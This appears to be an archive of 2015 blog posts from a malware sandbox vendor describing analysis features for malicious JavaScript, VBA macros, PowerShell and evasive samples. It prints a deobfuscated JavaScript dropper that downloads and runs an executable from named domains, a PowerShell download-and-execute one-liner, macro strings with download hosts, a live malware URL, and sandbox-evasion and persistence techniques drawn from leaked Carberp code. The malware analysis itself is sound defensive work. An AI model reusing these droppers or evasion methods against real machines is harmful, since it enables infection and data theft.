Tuesday, September 29, 2015

Sandboxes are not dead: automatically decoding a heavily obfuscated javascript

That's right. Sandbox technology is not dead, but some implementations can turn out to be if they are not maintained to adapt to the ever-changing threat landscape. In this blogpost we will take a look at a heavily obfuscated javascript and present some output of VxStream Sandbox's new decoder engine (just as Google, we consider any aspect of our product to be beta).

While malicious javascript is usually just the first step of an attack and often acts as a dropper, it can make sense to read the underlying source-code and understand how the algorithm of generating the point of contacts, in order to create better static signatures or more predictable firewall rules. While this is not a primary 'Sandbox' issue in general (as sandbox technology focuses mostly around runtime behavior, it is for the specific case of VxStream Sandbox, which tries to implement and combine static and dynamic analysis technologies.

Understanding the Obfuscation

Let's take a look at the basic Javascript and its structure.

// the ID of this campaign
var str="5550535E080510A4A070B4A0D085E17011614565E55505057575152575555";


// declare some string concatenating functions in random order
function ulln() { byfmst += 'r dn'; }; function xvtm() { byfmst += 'if ('; }; function bngfzt() { byfmst += 'mira'; }; function ydxxy() { byfmst += 'i-f'; }; function jjtwpgj() { byfmst += 'ew A'; }; function rfvfwwa() { byfmst += 'ring'; }; function uqvvt() { byfmst += '.cl'; }; function lkqok() { byfmst += '00'; }; function rmpmy() { byfmst += '}; i'; }; function oljwc() { byfmst += '== '; }; function agxgrsy() { byfmst += 'am'; }; function zvlw() { ygwoys += 'val'; }; function geypt() { byfmst += 'ode'; }; function ckqdv() { byfmst += 'ia.co'; }; function ydfkjy() { byfmst += 'f ('; }; function wyzo() { byfmst += 'id='; }; 


// put together all the strings
ulln(); jfqzddc(); srgjly(); xdvhde(); fafqmrk(); xcltdch(); kvbykg(); cxoi(); umlo(); jikrct(); myzkelk();

// finally trigger the payload using the re-built strings


As we can see from reading the above code (the comments were not part of the script, of course): it's quite obfuscated and not very understandable, nor is there some easy way to recreate the source-code or intention. Basically, what the malicious javascript* is doing to hide the "eval(payload)" operation (which is a very typical scheme by the way and prone to eval->print replacement attacks) is to split the underlying strings into a number of string concatenation operations nested in function calls. The nested aspect makes it quite diffcult for pure static deobfuscation to recreate the original string, because the function order declaration is randomized as well (i.e. a linear scan will not work).

* the full sample download and SHA256 is available on the report linked at the very bottom

Decoding the obfuscated Javascript

So what did we do to beat the obfuscated Javascript? Well, without going in too many details, we basically parsed the Javascript and emulated its execution, recreating the obfuscated strings allowing us to understand what is happening. This is how the "decoded and deobfuscated" javascript looks:

function dl(fr) {
    var b = "i-fizz.com siliconmedia.com samiragallery.com".split(" ");
    for (var i = 0; i < b.length; i++) {
        var ws = new ActiveXObject("WScript.Shell");
        var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ".exe";
        var dn = 0;
        var xo = new ActiveXObject("MSXML2.XMLHTTP");
        xo.onreadystatechange = function() {
            if (xo.readyState == 4 && xo.status == 200) {
                var xa = new ActiveXObject("ADODB.Stream");
                xa.type = 1;
                if (xa.size > 5000) {
                    dn = 1;
                    xa.position = 0;
                    xa.saveToFile(fn, 2);
                    try {
                        ws.Run(fn, 1, 0);
                    } catch (er) {};
        try {
            xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + str, false);
        } catch (er) {};
        if (dn == 1) break;

Looks better now? :-) Well, inspecting the code it becomes quite evident what is happening. The only interesting aspect seems to be the requirement for the response body (xa.size > 5000) and the 'id' and 'rnd' parameters passed as part of the 'document.php' GET request. It seems like random seeds and a campaign identifier.

Putting it all together in the report

So where do you find all this wonderful data in the report? Well, we created a few behavior signatures that make it a little easier for you to track down some of the deobfuscated strings. Also, keep in mind that any "string" extracted from any aspect of VxStream Sandbox is piped back to the string behavior signature interface, so you will see some regex matches on the URLs/domains. Following are some screenshots that highlight interesting parts of the report. It should be noted that the Javascript executed as expected: the extracted domains were contacted (see network traffic section) and files were dropped, most of them with VirusTotal rates at 1/56 or even marked as clean.

Report Link: https://www.reverse.it/sample/4a549052e2ab20d1b05e7c3bf54330a7058294f6bce919c3a6cedc9362e40324?environmentId=1



Sandbox systems can be quite sexy, if the underlying technology is sound and the codebase is updated on a regular basis. For us, the bottom line is that "automated malware analysis" is a cat & mouse game - something that every honest IT security vendor will admit. Analyzing programs automatically is simply very difficult and every day criminal gangs (and other parties) think of new tricks to bypass existing systems. That is one of the reasons why the webservice at http://www.reverse.it is public. The diversity is a perfect stress test and gives us the ability to constantly improve the system looking at failing samples, but it's a full time job.

Thursday, September 24, 2015

Evading APT industry leaders using the Task Scheduler

We often get asked how VxStream Sandbox compares to proclaimed malware analysis industry leaders and other competitors. One aspect when comparing e.g. a hardware appliance with VxStream Sandbox is that our system is very configurable and a wide open "virtual appliance" (it is possible to deploy and scale application servers as a VM with embedded analysis VMs). What that means is that a lot of aspects are open and understandable. You can add/edit your own behavior signatures, import your own ISO files (e.g. "golden image"), control what happens during the analysis and so on. that can be configured to run files on any environment. On the other hand, pre-configured and so called "hardened" appliances (marketing term for "black box with voodoo magic") are predictable and easier to detect and evade. The previous points are architectural aspects, but what about the actual engine, the malware analysis and forensics side? We were interested to see how well the "big players" actually match up to some common techniques and decided to make a spot check. We will not disclose what vendor or product we compared against, but it was indeed one of those industry leaders, but more to that later.


The "spot check"

For this blogpost we decided to take a look at a persistence method, because successful persistence of any piece of malware is always quite critical. For a malware analysis system, the very least should be detecting the capability, but in the best case successfully trigger and reveal the methodology involved. To make our small experiment as realistic as possible, we decided not to write our own sample code, but use an exact copy of something you would find in the wild. Preferrably, we would like to use source code from an existing botnet/exploit kit or trojan. Luckily, the source code of Carberp - a botnet creation kit - was leaked back in mid 2013 (by the way: it made over $250,000,000 in damages). Seems like a perfect match to build a poc sample and test it against our own and competitor's system(s).

In the specific case of Carberp, there is an additional explosiveness: one must assume that components of the leaked code will be copycatted into other "projects" of this kind. Thus, one would assume special diligence in respect to detecting crucial parts, e.g. a persistence method that survives a reboot, would be put forward by the industry leaders. As an example, this industry leader spends a whopping $68M in Research and Development.

Back to the technical part: the specific persistence method we were looking at utilizes the Task Scheduler 2.0 interface (Vista and above) and the implementing code from Carberp can be found on github at schtasks.cpp and is publicly available to anyone:

What is the Task Scheduler? To quote Microsoft:
"The Task Scheduler enables you to automatically perform routine tasks on a chosen computer. The Task Scheduler does this by monitoring whatever criteria you choose to initiate the tasks (referred to as triggers) and then executing the tasks when the criteria is met."
More precisely, the Task Scheduler 1.0 was shipped starting with Windows 2000, XP and Server 2003. It is quite old and not that interesting for our test case, because with v1.0 the process adding a task does so in a quite visible and easy-to-detect way for Sandbox systems that monitor specific processes. To be concrete: a *.job file (basically, an XML file that references conditions and actions) is created with the help of mstask.dll. The new Task Scheduler 2.0 interface (which was introduced with Windows Vista) is far more interesting though: it utilizes the taskschd.dll (Task Scheduler COM API) to invoke creation of the task through the Task Scheduler service (svchost.exe). When a sandbox system relies on observing actions of single processes only, it will have issues detecting the exact file creation and/or registry events, because the svchost.exe instance is not part of the process tree and subsequently not included in runtime logging. As VxStream Sandbox observes the entire file system state, it would detect tasks being scheduled, as a file system change happens.

So anyway, we quickly whipped up a proof of concept executable that creates a task to execute C:/malware.exe when a LOGON event is triggered. Should we succeed in setting this task on a Windows machine, we would expect all alarm signals of the analysis system to go off. Well, from all the systems we were able to test the our sample was classified as "benign" and had no malicious alerts of any relevance. Side note: want to try on your own appliance/sandbox? At the end of the blogpost we have a link to the VxStream Sandbox report which contains a download link to the sample we used.

So how did VxStream Sandbox perform? Please do take a look yourself (yes, we did optimize a bit before making this blogpost):

SHA256: fd6a9541b1826f5242395f789d341b1478e66e93a7c388d07f51146163494455



Some may call this blogpost nitpicking, because security always contains multiple layers and a sandbox is not a silver bullet. True, but if you charge premium price, have a big mouth regarding your own technology - then you should at least get your homework done and detect when a scheduled task is registered that runs an arbitrary executable on every reboot.
Something else we noticed: lately there has been a variety of blogposts around malware utilizing the COM interface in order to evade analysis and it seems like an uprising trend, because - as briefly mentioned - the malicious activity is happening at a remote process.

Monday, September 14, 2015

Using powershell as an infection vector

It's been a bit quiet on our blog over the past weeks while we have been busy implementing new features and analyzing samples we come accross on our public webservice (which has a new domain called reverse.it, by the way).

Bypassing Powershell's Execution Policy

About two weeks ago we came accross an interesting sample that was uploaded on our public webservice (and as the 'Do not share' button was not checked, also shared with VirusTotal)*. It uses powershell.exe to bypass the execution policy (see the -ep bypass part of the commandline) and it also uses the -Enc parameter to Base64 encode the expression that is invoked. To be precise, it is trying to download a script from an URL and executing it with a 'Invoke Expression' (iex) call. Here is the syntax:

$w=new-object net.webclient;$w.UseDefaultCredentials=$true;$w.Proxy.Credentials=$w.Credentials;iex($w.downloadstring('<URL>'))

See also the following screenshot from our report, which quite nicely detects this code snippit:

While these kind of bypassing tricks don't seem to be considerably new (see this excellent blogpost), it was the first time we saw it on our webservice and thought it would be a good idea to put some attention to these kind of tricks. You may have noticed in the screenshot above, while the Base64 artifact detection is not yet perfect, we do extract the most signifcant portion as part of the commandline and feedback the result into the signature interface. This ends up triggering all kind of other signatures, e.g. the URL regex pattern signature:

If you would like to see more details (and a download link to the sample), here are two reports on 32-bit and 64-bit environments:



The fact that malware is "outsourcing" and utilizing Windows components is a general trend I think we are seeing (e.g. the latest rise in COM interface utilization). So staying up-to-date with state of the art methods is a vital process and a mandatory requisite for any IT-Security product. If you have any interesting sample that you think could do better, please do send us a quick note to support@payload-security.com.

* if you upload any file to our webservice, even if you do check the 'Do not share' checkbox, a public report will be generated nevertheless (just with the download link disabled and no VT upload, if unknown). Also, please note that when a sample has been uploaded to VT (and is thereby part of the public domain), we will not delete your report if the upload was unintentional and it contains relevant information for the IT-Sec industry.

Sunday, August 16, 2015

About Dridex, decoding and deobfuscating VBE files, behavior signature triplets and other features

Decoding and deobfuscating embedded VBE files

We will start out this blogpost outlining the technologically speaking probably most exciting feature that we added recently: VxStream Sandbox is now able to detect, extract, decode and deobfuscate VBE (encoded visual basic) macros from input samples. This is a feature we are quite proud of, because we are probably the first and only sandbox that is capable of doing so. We would like to demonstrate the feature on a sample that someone just recently made us aware of: it's a dridex variant (the hash / sample is available at the bottom) that appears in form of a Windows shortcut file and contains an embedded VBE macro as part of its overlay. The sample does not yield good results on some 'APT industry leader' solutions, as we have heard. Anyway, what our system will do is the following:
  • Detect embedded VBE files
  • Carve them out as an 'extra file' for analysis
  • Decode the VBE file to a VBS file for later post-analysis-analysis
  • Launch the carved VBE file additionally to the input sample (in case the input sample fails to launch its payload)
  • Deobfuscate the decoded VBE file
  • Put all that information into the report and have it reflected as part of the Threat Score
The steps an analyst would usually need to take to extract/decode and deobfuscate the macro (to obtain e.g. the malicious URL) would be quite time intensive, so seeing all that in an automated fashion happening within minutes makes us quite happy. The following screenshots will give you just a brief excerpt of the most stunning parts of the report:

As can be seen, it is possible to even download the decoded *.vbs file for further analysis. Also, an interesting conclusion of this sample, especially if the actual payload is not executed, is that pure static analysis can be a very powerful tool when analyzing macros. It might be generic to instrument VB execution and extract data, but that always depends on a successful execution (i.e. what if the file doesn't run as expected?). That's why we believe in the combination of both dynamic and static analysis techniques: something we try to describe as 'Hybrid Analysis'.

Report (including download of sample): Here

Other progress

It is difficult to stay up-to-date with all the feature we add to our webservice, because there is no published changelog. That's why every now and then we like to make a blogpost that gives some insights, but also to recap and archive the development progress we made for ourself. Looking at our public webservice as a visitor, there is two places you can use to indirectly see the development:

Version number on the front page
Total behavior signatures

The total number of behavior has been on a constant rise since we went online late 2014. Whenever we find a new interesting sample, we check if there is some malicious/suspicious behavior that can be turned into a generic and replicable signature. For example, we just recently added a 'Sample was identified as malicious by a large number of Antivirus engines' signature in addition to the previous 'Sample was identified by at least one Antivirus engine'. The new signature has a far higher relevance on our internal 'Threat Score' calculation, because if 25% of 50+ AVs agree that a file is malicious, the chances of a false positive is quite low. While this isn't an example for a generic signature, it is a good example of the gradual and constant improvements that happen to our system all the time.

Incident Response Section

After getting some feedback of incident responders we decided to add a new section called 'Incident Response' that contains a 'Risk Assessment' and a 'Network' area. The 'Risk Assessment' area basically displays some more broad categories (such as 'Spyware/Leak') depending on whether a signature or a combination of signatures matched (configured internally). The idea behind it is to answer the question 'How worried should I be?' (e.g. if the submitter knows an information leaking file was executed on a computer in the finance dept.). 

The 'Network' area is a summary of what you would find in the 'Network Traffic' section to allow quick response based on the IPs and domain names. Ovearll, it does not contain more information than you would be able to read by sifting through the report, but it can save some time on a first glance. This is still a work in progress.

Platform Intelligence Section

The 'Platform Intelligence' section is also new and may appear on malicious reports. It is the beginning of a broader development agenda that we want to learn about a file by comparing/associating its data with data from other reports on the platform. As the database is growing (we have about 30k reports online right now), there will be more and more useful applications.

The first feature implemented as part of the 'Platform Intelligence' section is the 'Report Behavior Comparison' section, which - under the hood - is quite effective in regard to determining if a file is malicious if the report database is large and diverse. What we noticed was the following: if one looks at a single behavior signature (e.g. 'Contains ability to retrieve keyboard strokes') it is often not a strong enough indicator to make a verdict about the file (think of an installer, which is often packed, drops files, shows network activity, sets an autostart registry key, etc.). When one looks at certain combinations of signatures though (e.g. 'Contains ability to retrieve keyboard strokes' AND 'Writes data to a remote process' AND ...) and you check each combination against every report (benign or malicious) in the entire database, it is possible to isolate signature combinations that are unique to malware. Using signature combinations, it is also possible to classify malware, but we have not gone that far yet. Anyway, what we can say is: the larger the number of signature tuples, the higher the confidence will be, but the more specific to certain malware families. Again, this is still a work in progress, but what is nice about the implementation is that we calculate all tuples on-the-fly based on a live snapshot of all triplets of all malicious reports in the database (i.e. if you refresh a report the next day, you might see different data). This feature has been a research topic of one of our main developers some years ago, and because it is still a work in progress and relatively experimental, the results of the section are not added to the 'Threat Score', but just displayed as an additive to the rest of the report.

Wednesday, July 8, 2015

Walking through a report of Win32/Rioselx.B

This time our blogpost will demonstrate a pretty nice report (VT at 6/54) our sandbox VxStream generated for an Angler related artifact that is classified as Rioselx.B by ESET (Baidu seems to have adopted the same name for some odd reason). Artifact name found in the context: Angler_5_770_0.bin_


Walking through the report

Note: if you want to follow our analysis in a second screen, scroll to the bottom for links.

What we like to do when looking at a report first is to start in a top-down approach, i.e. we start looking at the malicious signatures first. We quickly understand how the malware propagates:

... using the known QueueApcThread method.

We understand that it tries to fingerprint the system, lowers the security and tries to avoid being deleted through a rollback (disabling auto-update, disabling system restore):

Now, of course, it depends on whether we are interested in simply understand that this is something we don't want to execute (in that case, we are done already), but extract indicators that we could use to feed into external systems, update security rules or generate signatures. In the latter case, the 'Writes shellcode to a remote process' seems promising.

Taking a look at the process tree (scroll down to 'Hybrid Analysis' on the right-side menu), we identify that only one process contains Stream or Shellcode Stream (disassembly listings) data:

Taking us to the next screen:

Here we marked a possible unique string identifier for this sample that could be used for YARA signatures:'@grcuk24/ghn' --- a brief query on our favorite DBs might confirm this.

Taking a look at the network traffic gives a good overview of domains/IPs you might want to blacklist. As they have only been seen in the overall webservice network traffic analysis 2 times, it is another indicator that we are not looking at 'white-noise' traffic.

 If we scroll beyond the network section, we find the Strings tab. Hit the 'Details' button to see extended information on the encoding (Ansi/Unicode) and where the string was obtained from (e.g. a runtime API parameter, binary scan, memory dump): 

In the 'All Strings' tab relatively far at the top we find two interesting strings that might be an obfuscated IP address. At least the string "89, 143, 187, 66" (which looks oddly much like an IP address, if you substitute the ", " with a "." dot character). It seems to resolve to Slovenia now and shows no malicious context on VirusTotal.

Checking out the 'Dropped Files' section of the kernelmode monitor report, we can detect additional artifacts being dropped that are also marked as malicious on VirusTotal as 'Chgt.O' (again: hit the 'Details' button to see the hash values for dropped files).

 Note: all dropped files are checked against VirusTotal

More PE fun

If you scroll back to the 'File Details' tab and click on the 'Visualization (PortEx)' link, that takes us to a PE Layout visualization that is often overlooked. This is actually also a nice way to detect some interesting and malicious code locations.

The 'PE Layout' screen is a split-screen. On the left side is the 'entropy' of the PE file (i.e. the darker the spots, the higher the entropy; the higher the entropy, the more random the bytes in the sequence are; the higher the randomness, the more probable is the presence of packed/compressed data). The right hand side shows the general PE layout (see the legend on the very right), the entrypoint is marked with a small red dot, the import section in purple/pink, the resource section in green. We've highlighted the packed regions: what's suspicious is that there seems to be packed code following the entrypoint, between the import/resource section and as a possible overlay at the very end beyond the resource section. Of course, only a manual analysis can give more insights into these areas, but that is beyond the scope of the report.


Final Words

With this blogpost we hopefully gave more insights into how one can go about reading a report. Of course, there is a lot more you could do (like download and analyze the PCAP file, etc.), but we covered the basics. The standalone version comes with XML reports, an API and many other things that are more suitable for an integration of the sandbox in larger automated systems (more information).

Here is a link to the sample (also available at the top of the report). Please do try it on your favorite sandbox/security solution and we'd be happy to get some feedback at info@payload-security.com on how your experience was.



Here's the report on Windows 7 32-bit using our usermode technology: Click
This is the report on Windows 7 32-bit using our kernelmode technology: Click

Both of the reports are pretty much identical, which is a good indicator as to how strong the usermode anti-detection technology is, because the kernelmode monitor is far less prune to being detected (as the malware process remains untampered).

Thursday, May 21, 2015

Improved PDF analysis and Windows 10 Preview

Today we made another 'technological leap' with VxStream Sandbox related to PDF analysis. As most of you surely know, PDF phishing campaigns are a very popular attack vector (invoice/mail tracking PDF with a link to the malicious file). The new version of VxStream is capable of parsing PDF file structure and pulls out URLs it finds. Not only that, but it will also download files at the URLs and execute them if they are supported by the environment. If the downloaded file is a zip archive, it will even unpack it before analysis. Sounds good? :) It is!

Anyway, the feature is very new and does not work with the 'Stealthy Mode' yet, so you may have mixed experiences. The online service is updated with it and here is a first report of a PDF file that ran with the new feature:


Please take note of three things:
  1. The signature 'The input sample dropped a file that was identified as malicious' (that's the .exe file behind the malicious URL)
  2. The signature 'Found potential URL in binary/memory', which contains the malicious URL (it's still online, so beware; hxxp://www.sarnfields.co.uk/mcP5sr8XS4)
  3. The dropped file was actually executed (see 'Hybrid Analysis' section, click on the process)
The sample is available for download at the report (see link at the top)
SHA256: 11edf9436a9205c88c2a815cf6ebfb0a7a42eb150a2649766b3bb30350ee35ed

Windows 10 Insider Preview

Another part we have been working on (but not on the public servers yet) is Windows 10 compatibility. Here is a first run of the latest benchmark tool 'Pafish' on Windows 10 'Insider Preview':

The new background image is really cool, don't you think? :-)

Thursday, May 7, 2015

Staying up-to-date with Malware Sandbox Detection: About Tinba, Human Behavior and Harddisc Cylinders

Just yesterday F-Secure made a blogpost about a new sample of Tinba that implements a new combinational evasion technique of sandbox systems, which on the one hand checks for human interaction indicators based on mouse movement (using GetCursorPos) and switching active foreground windows (using GetForeGroundWindow), as well as the disc size. Theoretically, all of these sandbox detection techniques are old cake and e.g. part of the 'Pafish' benchmark tool that implements typical evasion techniques:

Disc size check in Pafish (reference)

The new technique implemented by the Tinba sample that F-Secure posted about is that it checks the disc size not in a typical way. It uses the 'IOCTL_DISK_GET_DRIVE_GEOMETRY_EX' control code and counting the number of cylinders, which is a nice low-key way of determining the actual disc size. The structure returned by NtDeviceIoControl using the control code mentioned earlier eventually results in this data structure:

If we can intercept calls to NtDeviceIoControl and spoof the number of Cylinders accordingly, it is possible to make any disc size appear to have an arbitrary size.

As outlined in our noticed blogpost 'Benchmarking some popular public malware analysis services regarding their "Anti-VM" technology' that we posted about in February it is part of our daily job to try to stay up-to-date with sandbox evasive technologies. So that is what we did here.

As VxStream Sandbox runs by default with some 'action scripts' that simulate user behavior the first part of Tinba's sandbox detection was passed to begin with. As we already implement a variety of spoofing techniques it was easy to extend the current engine. Re-running the sample had the desired result: the checks were passed and Tinba starting showing a lot more behavior.

Report of Tinba with the latest VxStream Anti-VM Detection Technology

Additionally, we created a new behavior signature called 'Queries disc information (often used to evade virtual machines)' in order to generically detect this kind of behavior on any sample analyzed in the future.

Report URL: https://www.hybrid-analysis.com/sample/476fc456c66cbec138e3dab72a0f0e54f203dbf27ce88736b1893b668bce63c4?environmentId=1

Tuesday, May 5, 2015

Technology Boost: introducing 'Stealthy Mode' monitor engine and Single-File HTML Reports

today is a big release day with two new major features that we worked on over the past 9-10 months, which are also available on our online webservice at http://www.hybrid-analysis.com right now.

Kernelmode Monitor

You can now chose a 'Stealthy Mode' environment, which is a completely new monitoring technology that leaves the malware sample untampered. Basically, a lot of sandbox systems and even AV products (see this blogpost: http://rce.co/why-usermode-hooking-sucks-bypassing-comodo-internet-security/) rely on injecting and tampering with processes in userland. With the new 'Stealthy Mode' of VxStream Sandbox the sample is executed untampered and observed from the operating system level, which is far less detectable. Our new technology is a milestone and takes VxStream to a level that is only matched by very few competitors on the market.

Note: choose the W7 32 bit 'Stealthy Mode' environment upon submission to try it out

Of course, we still do memory dumps of the analyzed processes so that the reports benefit from Hybrid Analysis technology. Essentially, you will not notice much difference between the usermode and kernelmode monitor, except that certain specific malware samples that are aware of their memory image tampering will run a lot better under 'Stealthy Mode'. Also, the new kernelmode monitor comes with some basic anti-VM detection technology just like the usermode monitor.

The above picture is taken from a sample report running the known 'Pafish' benchmark (v0.4) with the new kernelmode monitor: https://www.hybrid-analysis.com/sample/bf0bbd28deed92fbd9f974e63336c2a4185a07ed19c578a37885d351134c0182/?environmentId=4

Single-File HTML Reports

It is now possible to 'persist' and download single-file HTML reports for any analysis report generated as-of now. This is another feature we have been working on and the HTML reports are generated based off of the XML reports and completely separate from the online reports (which are just a view on JSON documents stored in a MongoDB). The HTML reports are nice, if you want to share or keep a report. It is not as complete as the online reports yet, but also contains a few other details (such as the exact VT results).

Sample HTML report hosted at our company site: here
Corresponding Hybrid-Analysis.com report: here

Of course, we will be extending and working on both of these two new code 'projects' over the coming months, so stay tuned.

// EOF


It is possible to license VxStream Sandbox and run it on-premise

If you are interested in licensing the full version of VxStream Sandbox (includes the web application to run your own service, an API, the runtime monitor, the load balancing controller, hybrid analysis technology, report generator, all behavior signatures, scripts, etc.) or have any questions, please use our contact form and get in touch. We have a very simple licensing structure and additional options. If you are interested in a demo, try out our free malware analysis service at hybrid-analysis.com.

Tuesday, April 14, 2015

Improved webservice statistics and a new feature called 'Behavior Chronology'

Actually, we had meant to use this blogpost to write about specific malware samples and forensic investigation techniques applied to such specific samples, but our latest development tasks are taking up all the time of the team right now. Since we don't want our users to miss out on any of the latest additions, we are going to briefly outline some new features in yet another update blogpost.

Webservice Statistics

We made a complete 'rehaul' of the webservice statistics page. It is something we had been planning to do, because there is some really neat things possible using the report data - and now that we have more than 8000 reports in our database - we thought the time was ripe. Over time, we will surely add more and different output, so this is really just an introduction. The new webservice statistics include information on:
  • Potentially Interestings Samples (Original AV% < 10 with Threat Score > = 80)
  • A nice area spline that shows the reports generated over the past 100 days
  • The top 20 file types processed on the webservice
  • The top 20 file packers detected on the webservice
  • The top 20 virus families detected on the webservice
  • A new 'AV Detection Distribution' that shows how many AVs trigger on a given sample (e.g. only 2% of the time more than 90% agree a file is malicious)
  • A top/bottom statistic of matched signatures (with a search link if you hover the pie)
  • Some additional facts (like the % of users sharing samples with the community)

What we really like the most is the 'Potentially Interesting Samples' section, because it is a really fast way to dive into reports that might contain something new (and these reports usually underline the strengths of a sandbox system). Why? Because if the AV detection is 'low' (it's usually always the same candidates that perform well) and the 'Threat Ratio' (which is calculated by our sandbox system and mainly based on the behavior signatures and a predefined relevance) is high, the input sample is probably a new variant or implementing some interesting tricks to avoid AV detection.

A nice 'fun fact' is that nearly 80% of all uploaded samples are also shared with the community. We think that is really a great positive signal and shows the character of the IT-Security community (at least of our users).

Behavior Chronology

This feature is really new and was actually added to all new generated reports this morning. Basically, it's a new diagram that puts behavior signatures which are based on some kind of 'time-related event' (like an API call, a registry access or file event) in a chronological order, specifically by the first time the associated signature triggered. This is not per-process, but a very global view on what is happening on the underlying system. The following diagram shows an example:

Hovering over some of the bubbles (by the way: their size is based on the relevance of the associated signature), we can quickly get a brief impression on what the file is doing. At the beginning, it queries the machine version, the windows account name, etc., then it starts sleeping for a long time and eventually prepares some internet related things (modifying the proxy settings) and persists itself. Here is a link to the report associated with the diagram above. This global perspective (as it's not per-process) on specific behavior 'events' (especially with our growing signature database) should give some unique and added insights into the 'what happens when' part of investigation. Also, some meta-signatures that could trigger when detecting specific event sequences could be added in a future version. Either way, in our opinion the feature shows that automated malware analysis and digital forensics is an 'open end' topic and there's so many things still waiting to be implemented.

If you have any questions or would like to make feature suggestions, feel free to use our contact form and we will get back to you shortly.

Monday, March 23, 2015

Latest Updates of VxStream Sandbox and the Malware Analysis Service at Hybrid-Analysis.com

A previous blogpost published at the beginning of February outlined some of the new features that were added to our online malware service. We have added quite a lot of functionality since then and think it is a good idea to post a brief summary of what that is exactly to keep our readers and users up-to-date.


Updated Anti-VM Technology

After Pafish v0.4 (a benchmarking tool that implements common VM detection methods) was released earlier this year, we updated our anti-vm technology to be up-to-date and made a small benchmark of some popular malware analysis services at the same time. Today, Pafish v0.5 was released and we will start working on our anti-vm technology in the coming weeks and keep you updated on any progress.


Improved Searching Capabilities

We improved the webservice search and added some more advanced search options. On the previous version, you were able to search by filename, MD5 or SHA256 hash. Now, you can also search for a virus family name, all reports that contacted a specific host IP address or domain. Examples:
Please note: if only one result is returned by the search, you are automatically redirected to the report. Also, the vxfamily search is a substring search and applies only to the VxStream determined virus family name. All search results are limited to at most 100.

Also, some of the new searching capabilities were integrated into all online reports with direct links, so you can continue navigating to other reports by clicking the virus family name or quickly find other reports with common network destinations (see the following image).


Updated VBA Macro Parsing

As we had been getting more and more uploads of Word files and malicious XML files (and not all of them triggered or showed outgoing network traffic), we spent some time and added a small VBA "de-obfuscating" engine that helps extracting C2 IPs regardless of the runtime behavior. We made a blogpost about it last week that received good feedback and is showing some good results so far. After we published the blogpost, Philippe Lagadec announced that he is working on a generic engine that does the same and more - so we are looking forward to that development and will keep you updated on any progress.


Other updates not mentioned anywhere

Of course, we also make updates that are not published as part of blogposts or mentioned in the FAQ page of the service, because it would take too much time and not everything is really significant. Some of these updates over the past week included:
  • we added new YARA signatures that run on all input samples (we have ~600 online right now)
  • we have been adding more generic behavior signatures (we have ~215 online right now)
  • we added a webservice statistics page to clean up the front page, which tells you the current status of the number of signatures loaded by the system
  • we added support for MIME types (i.e. you can upload a MIME type and the service will "unmime" it and analyze a valid file, if it is embedded)
  • we added "environment groups" (multiple systems) that can be selected from if you upload a file
  • we added some Windows 8.1 VMs
  • we added the ability to "not share" a sample when submitting (it is not available for download and not uploaded to VirusTotal, if unknown)
  • we added a download for strings detected in-memory
  • we added shellcode streams that are extracted from memory written to foreign processes
  • we brushed up the visuals a bit, especially the submissions list that contains a lot more information now
.. and a few other minor things that should not be mentioned here.

Saturday, March 14, 2015

Analyzing obfuscated VBA macros to extract C2 IP/URLs regardless of runtime behavior


Lately, we have been seeing quite a lot of Office documents (or XML files with embedded Office documents, etc.) that have embedded VBA macros on our malware analysis service, which try to drop Dridex or similar. Internally, we use olevba (thanks for this great tool to Philippe Lagadec, by the way!) to extract the VBA macro source code. Sometimes though, the Word file does not "trigger" (as it might include some VM detection code, requirement incompatibilities, etc.) so that in order to extract something useful like a C2 IP/URL nevertheless, we are left with static analysis techniques and an often heavily obfuscated macro source. Here's an example:
Function \xe2\xe0\xfb\xe2\xc0\xc0\xfb\xe2\xef\xfb\xe2\xe0(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean

\xcf\xd0\xfb\xe2\xe0\xc0 = 
z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&amp;, 0&amp;)

Set \xe3\xed\xc3\xd8\xc0\xcf\xf8\xe2\xfb\xe0 = 
CreateObject(QSzFZhQCxywB(Chr$(83) &amp; Chr$(132) &amp; 
Chr$(104) &amp; Chr$(55) &amp; Chr$(101) &amp; Chr$(87) 
&amp; Chr$(108) &amp; Chr$(89) &amp; Chr$(108) &amp; 
Chr$(131) &amp; Chr$(46) &amp; Chr$(133) &amp; Chr$(65) 
&amp; Chr$(52) &amp; Chr$(112) &amp; Chr$(97) &amp; 
Chr$(112) &amp; Chr$(61) &amp; Chr$(108) &amp; Chr$(117) 
&amp; Chr$(105) &amp; Chr$(47) &amp; Chr$(99) &amp; 
Chr$(110) &amp; Chr$(97) &amp; Chr$(122) &amp; Chr$(116) 
&amp; Chr$(59) &amp; Chr$(105) &amp; Chr$(75) &amp; 
Chr$(111) &amp; Chr$(54) &amp; Chr$(110) &amp; Chr$(115)))"
As we can see (even with VB syntax highlighting ;-) it is not very human friendly and applying a regex to pull an URL will not work either. In order to understand the VBA source better (and possibly apply some patterns), we would need to resolve e.g. the Chr$() calls, the ampersands, concatenate strings and so forth. As this is a pretty straightforward and "dumb" and "time consuming" manual process, we had an idea: why not do try to automate these kind of tasks - after all this is crying for a computer program to process. So we developed a small "simplifier" engine/algorithm that does some multi-passes through the various VBA functions to resolve and concatenate strings (and a little bit more). Additionally, we implemented some semi-intelligent brute-force mechanisms to extract URLs from the "simplified source code", as some of them are often padded with trash bytes or other simple algorithms.

Here is a "before/after" example to make this "simplification" a bit more understanding.


URLLSK = "www.asivamosensalud.org/images/log"

STAA = "savepic.su/5238122"

STAB = "savepic.su/5233002"


Print #Kasdwq, "c" &amp; "s" + "c" &amp; "ri" &amp; "pt" &amp; ".e" &amp; Chr(120) &amp; "e " &amp; Chr(34) &amp; "c:\W" + "indows\T" + "emp" + "\" + VBTXP + Chr(34)Print #Kasdwq, "pin" + "g -n" &amp; " 2" + ""

Print #Kasdwq, "" + "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc("e")) + Chr(Asc("x")) + Chr(Asc("e"))


Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + URLLSK + "." + Chr(Asc("j")) + Chr(Asc("p")) + "g" + Chr(34)

Print #FileNumber, "statRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + STAA + "." + Chr(Asc("p")) + Chr(Asc("n")) + "g" + Chr(34)


Print #Kasdwq, "cscript.exe "c:\Windows\Temp\adobeacd-updatexp.vbs""

Print #Kasdwq, "ping -n 2"

